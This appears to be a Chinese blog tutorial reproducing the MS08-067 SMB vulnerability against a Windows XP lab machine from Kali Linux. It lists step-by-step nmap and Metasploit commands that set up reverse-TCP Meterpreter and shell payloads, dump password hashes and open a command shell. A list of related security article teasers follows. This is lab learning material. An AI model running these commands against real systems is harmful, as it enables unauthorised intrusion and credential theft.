ms08-067
一.实验环境搭建
1.靶机:一台有漏洞的windows xp 2002 ip:192.168.0.116
2.攻击机:一台kail liunx ip:192.168.0.110
二.开始复现
1.使用nmap工具进行扫描确认存在漏洞,nmap -n -p445 --script smb-vuln-ms08-067 192.168.0.116 --open (小伙子的nmap是7.4)
2.打开神器metasploit,终端输入:msfconsole
3.搜索漏洞,search ms08-067
4.使用模块,use exploit/windows/smb/ms08_067_netapi
5.查看需要设置的参数,show options
6.设置靶机ip,set RHOST 192.168.0.116
7.设置payload,set payload windows/meterpreter/reverse_tcp
8.查看参数设置,这里需要设置攻击机ip,show options
9.设置本地ip,set LHOST 192.168.0.110
10.target系统默认是自动定位,如果需要精确的话,可以show targets查看所有,然后进行选择,set target x,这里小伙子就默认了
11.运行exploit,成功获取到sessions
12.输入ps,查看进程
14.抓取本地hash(这个功能好像只有是管理员以上才可以使用)
15.输入shell,来到cmd模式
三.介绍这个模块的另外一个payload
1.还是使用这个攻击模块,use exploit/windows/smb/ms08_067_netapi
2.设置参数set payload windows/shell/reverse_tcppayload 设置payload
set RHOST 192.168.0.116 设置靶机ip
set LHOST 192.168.0.110 设置攻击机ip
3.检查参数是否有错,show options(target也是默认就好)
4.运行,exploit,直接获取一个shell
感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!
相关阅读
漏洞等级:高危 Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、
上一回,我们阐述了一下我们的目标以及整理了一下我们的解决方案。接下来就需要上代码了。不过在此之前,有几点我需要说明一下: 1、由
一、背景昨天(2018-07-04)微信支付的SDK曝出重大漏洞(XXE漏洞),通过该漏洞,攻击者可以获取服务器中目录结构、文件内容,如代码、各种私钥
入行云安全有快两年了,从最开始的不懂安全一脸懵懂,到现在略微能对行业“指点”一二,感触良多。本文重点讲一讲在线漏洞扫描服务以及
XSS简介 XSS是跨站脚本攻击(Cross Site Scripting)的简写,为了不与层叠样式表混淆而改写的。此漏洞也是网站存在相当多的漏洞,仅次